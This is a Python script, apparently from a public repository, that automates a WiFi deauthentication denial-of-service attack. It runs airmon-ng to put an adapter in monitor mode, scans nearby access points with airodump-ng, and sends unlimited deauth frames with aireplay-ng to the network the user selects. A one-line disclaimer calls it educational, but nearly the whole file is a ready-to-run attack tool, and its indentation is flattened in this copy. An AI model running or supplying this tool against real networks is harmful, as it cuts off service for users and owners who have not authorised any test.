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wifi_dos_v1.py
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wifi_dos_v1.py
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#!/usr/bin/env python3
# Disclaimer: This script is for educational purposes only. Do not use against any network that you don't own or have authorization to test.
# We will be using the subprocess module to run commands on Kali Linux.
import subprocess
# We require regular expressions.
import re
# We want to open the CSV files generated by airmon-ng,
# and we'll use the built-in csv module.
import csv
# We want to import os because we want to check for sudo
import os
# We want to use time.sleep()
import time
# We want to move .csv files in the folder if we found any.
# We'll use shutil for that.
import shutil
# Create a timestamp for .csv filename
from datetime import datetime
# Create an empty list
active_wireless_networks = []
# We use this function to test if the ESSID is already in the list file.
# If so we return False so we don't add it again.
# If it is not in the lst we return True which will instruct the elif
# statement to add it to the lst.
def check_for_essid(essid, lst):
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
# This will only run if there are wireless access points in the list.
for item in lst:
# If True don't add to list. False will add it to list
if essid in item["ESSID"]:
check_status = False
return check_status
os.system("clear")
# Basic user interface header
print("""\033[92m
[+]---------------------------------------------------------------------[+]
| __ _____ ___ ___ ___ ___ ___ ___ _____ _ |
| \ \ / /_ _| __|_ _| | \| \ / _ \/ __| |_ _|__ ___| | |
| \ \/\/ / | || _| | | | |) | |) | (_) \__ \ | |/ _ \/ _ \ |__ |
| \_/\_/ |___|_| |___| |___/|___/ \___/|___/ |_|\___/\___/____| |
| |
| github page : https://github.com/R3DHULK |
[+]---------------------------------------------------------------------[+]
""")
# If the user doesn't run the program with super user privileges, don't allow them to continue.
if not 'SUDO_UID' in os.environ.keys():
print("\033[91m [-] Try running this program with sudo.")
exit()
# Remove .csv files before running the script.
for file_name in os.listdir():
# We should only have one csv file as we delete them from the folder
# every time we run the program.
if ".csv" in file_name:
print("\033[93m [-] There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.")
# We get the current working directory.
directory = os.getcwd()
try:
# We make a new directory called /backup
os.mkdir(directory + "/backup/")
except:
print("\033[94m [+] Backup folder exists.")
# Create a timestamp
timestamp = datetime.now()
# We move any .csv files in the folder to the backup folder.
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
# Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher.
wlan_pattern = re.compile("^wlan[0-9]+")
# Python allows is to run system commands by using a function provided by the subprocess module.
# subprocess.run(<list of command line arguments goes here>)
# The script is the parent process and creates a child process which runs the system command,
# and will only continue once the child process has completed.
# We run the iwconfig command to look for wireless interfaces.
check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode())
# No WiFi Adapter connected.
if len(check_wifi_result) == 0:
print("\033[91m [-] Please connect a WiFi adapter and try again.")
exit()
# Menu to select WiFi interface from
print("\033[92m [*] The following WiFi interfaces are available:")
for index, item in enumerate(check_wifi_result):
print(f"\033[92m {index} - {item}")
# Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from.
while True:
wifi_interface_choice = input("\033[95m [*] Please select the interface you want to use for the attack: ")
try:
if check_wifi_result[int(wifi_interface_choice)]:
break
except:
print("\033[97m [*] Please enter a number that corresponds with the choices available.")
# For easy reference we call the selected interface hacknic
hacknic = check_wifi_result[int(wifi_interface_choice)]
# Tell the user we're going to kill the conflicting processes.
print("\033[92m [+] WiFi adapter connected!\nNow let's kill conflicting processes:")
# subprocess.run(<list of command line arguments goes here>)
# The script is the parent process and creates a child process which runs the system command,
# and will only continue once the child process has completed.
# We run the iwconfig command to look for wireless interfaces.
# Killing all conflicting processes using airmon-ng
kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"])
# Put wireless in Monitor mode
print("\033[93m [*] Putting Wifi adapter into monitored mode:")
put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic])
# subprocess.Popen(<list of command line arguments goes here>)
# The Popen method opens a pipe from a command.
# The output is an open file that can be accessed by other programs.
# We run the iwconfig command to look for wireless interfaces.
# Discover access points
discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", hacknic + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
# Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c.
try:
while True:
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
# This will run multiple times and we need to reset the cursor to the beginning of the file.
csv_h.seek(0)
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
# We want to exclude the row with BSSID.
if row["BSSID"] == "BSSID":
pass
# We are not interested in the client data.
elif row["BSSID"] == "Station MAC":
break
# Every field where an ESSID is specified will be added to the list.
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("\033[91m [*] Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("\033[93m No |\tBSSID |\tChannel|\tESSID |")
for index, item in enumerate(active_wireless_networks):
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
# We make the script sleep for 1 second before loading the updated list.
time.sleep(1)
except KeyboardInterrupt:
print("\033[92m\n [+] Ready to make choice.")
# Ensure that the input choice is valid.
while True:
# If you don't make a choice from the options available in the list,
# you will be asked to please try again.
choice = input("\033[92m [+] Please select a choice from above: ")
try:
if active_wireless_networks[int(choice)]:
break
except:
print("\033[91m [-] Please try again.")
# To make it easier to work with and read the code, we assign the results to variables.
hackbssid = active_wireless_networks[int(choice)]["BSSID"]
hackchannel = active_wireless_networks[int(choice)]["channel"].strip()
# Change to the channel we want to perform the DOS attack on.
# Monitoring takes place on a different channel and we need to set it to that channel.
subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel])
# Deauthenticate clients using a subprocess.
# The script is the parent process and creates a child process which runs the system command,
# and will only continue once the child process has completed.
subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"])
# User will need to use control-c to break the script.